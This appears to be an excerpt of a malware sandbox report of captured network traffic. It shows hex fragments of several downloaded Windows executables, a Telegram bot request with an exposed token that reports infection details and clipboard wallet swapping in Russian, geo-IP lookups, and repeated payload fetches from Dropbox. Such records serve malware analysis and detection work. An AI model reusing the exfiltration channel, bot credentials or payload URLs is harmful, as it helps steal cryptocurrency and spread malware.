0a 28 07 00 00 0a 6f 07 00 00 06 2a 22 02 6f 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:18 GMTcontent-type: application/x-msdownloadcontent-length: 179200server: nginxlast-modified: Tue, 02 Jul 2024 10:09:37 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 b1 02 00 00 20 00 00 00 b2 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d1 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 43 01 00 94 8d 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 14 2a 00 06 2a 00 00 0a 14 2a 00 06 2a 00 00 1a 72 01 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 06 2a 00 00 06 2a 00 00 36 02 72 01 00 00 70 03 6f 11 00 00 06 2a 00 00 0a 14 2a 00 0a 14 2a 00 0a 03 2a 00 0a 14 2a 00 22 1f fe 73 5e 00 00 06 2a 00 00 00 3e 1f fe 73 66 00 00 06 25 02 7d 22 00 00 04 2a 0a 16 2a 00 0a 04 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 16 16 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 03 17 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 1e 02 73 56 00 00 06 2a 32 02 6f 1e 00 00 06 73 52 00 00 06 2a 00 00 00 32 02 6f 1e 00 00 06 73 4c 00 00 06 2a 00 00 00 13 30 04 00 2f 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 02 6f 06 00 00 06 20 a7 00 00 00 28 05 00 00 0a 12 00 28 06 00 00 0a 2c 02 06 2a 23 00 00 00 00 00 00 00 00 2a 00 4e 02 0f 01 28 05 00 00 0a 28 07 00 00 0a 6f 07 00 00 06 2a 22 02 6f 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:19 GMTcontent-type: application/x-msdownloadcontent-length: 328192server: nginxlast-modified: Tue, 02 Jul 2024 17:49:14 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 3e b0 62 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f6 04 00 00 0a 00 00 00 00 00 00 1e 15 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 14 05 00 4f 00 00 00 00 20 05 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 f5 04 00 00 20 00 00 00 f6 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 16 06 00 00 00 20 05 00 00 08 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 05 00 00 00 00 00 48 00 00 00 02 00 05 00 74 ba 02 00 58 5a 02 00 03 00 02 00 82 04 00 06 bc b9 02 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 40 bf 6f 17 03 71 77 e7 79 fc 70 4f 20 72 9c 50 00 00 00 05 00 00 00 01 00 00 00 57 00 00 00 05 00 00 00 01 01 00 00 53 00 00 00 05 00 00 00 11 00 00 00 5b 00 00 00 05 00 00 00 01 10 00 00 51 00 00 00 05 00 00 00 05 00 00 00 59 00 00 00 05 00 00 00 01 04 00 00 55 00 00 00 05 00 00 00 41 00 00 00 5d 00 00 00 05 00 00 00 01 40 00 00 50 00 00 00 05 00 00 00 03 00 00 00 58 00 00 00 05 00 00 00 01 02 00 00 54 00 00 00 05 00 00 00 21 00 00 00 5c 00 00 00 05 00 00 00 01 20 00 00 52 00 00 00 05 00 00 00 09 00 00 00 5a 00 00 00 05 00 00 00 01 08 00 00 56 00 00 00 05 00 00 00 81 00 00 00 c0 00 00 00 05 00 00 00 01 60 00 00 50 00 00 00 05 00 00 00 02 00 00 00 57 00 00 00 05 00 00 00 81 01 00 00 53 00 00 00 05 00 00 00 19 00 00 00 5b 00 00 00 05 00 00 00 01 18 00 00 51 00 00 00 05 00 00 00 07 00 00 00 59 00 00 00 05 00 00 00 01 06 00 00 55 00 00 00 05 00 00 00 61 00 00 00 5d 00 00 00 05 00 00 00 01 60 00 00 50 00 00 00 05 00 00 00 04 00 00 00 58 00 00 00 05 00 00 00 01 03 00 00 54 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:20 GMTcontent-type: application/x-msdownloadcontent-length: 48640server: nginxlast-modified: Wed, 03 Jul 2024 05:25:35 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 b0 00 00 00 20 00 00 00 b2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 59 00 00 00 76 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02 00 00 6f 9e 00 00 0a 2a 6e 7e 1e 00 00 04 39 10 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:21 GMTcontent-type: application/x-msdownloadcontent-length: 48640server: nginxlast-modified: Wed, 03 Jul 2024 05:25:35 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 b0 00 00 00 20 00 00 00 b2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 59 00 00 00 76 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02 00 00 6f 9e 00 00 0a 2a 6e 7e 1e 00 00 04 39 10 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:24 GMTcontent-type: application/x-msdownloadcontent-length: 64512server: nginxlast-modified: Wed, 03 Jul 2024 23:16:12 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 10 00 00 00 00 00 00 9e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 09 01 00 53 00 00 00 00 20 01 00 f5 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e9 00 00 00 20 00 00 00 ea 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f5 0d 00 00 00 20 01 00 00 0e 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 01 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 65 00 00 68 a3 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 48 33 c0 c3 00 00 00 00 b8 57 00 07 80 c3 00 00 33 c0 c2 14 00 00 00 00 2e 00 2f 00 5c 00 00 00 1e 02 28 1b 00 00 0a 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1e 02 80 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 1a 7e 1e 00 00 04 2a 1e 02 80 1e 00 00 04 2a 2a 02 28 43 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 44 00 00 0a 2a fa 73 bd 00 00 06 25 72 bd 12 00 70 6f a8 00 00 06 28 68 00 00 0a 72 85 13 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 6f b5 00 00 06 6f b2 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 17 00 00 0a 2a da 73 bd 00 00 06 25 72 bd 12 00 70 6f a8 00 00 06 72 9f 13 00 70 6f b5 00 00 06 25 72 9f 13 00 70 6f a8 00 00 06 02 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:25 GMTcontent-type: application/x-msdownloadcontent-length: 307712server: nginxlast-modified: Thu, 04 Jul 2024 00:04:16 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 02 03 00 57 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 14 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 62 00 6d 00 74 00 69 00 61 00 57 00 68 00 6d 0

Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
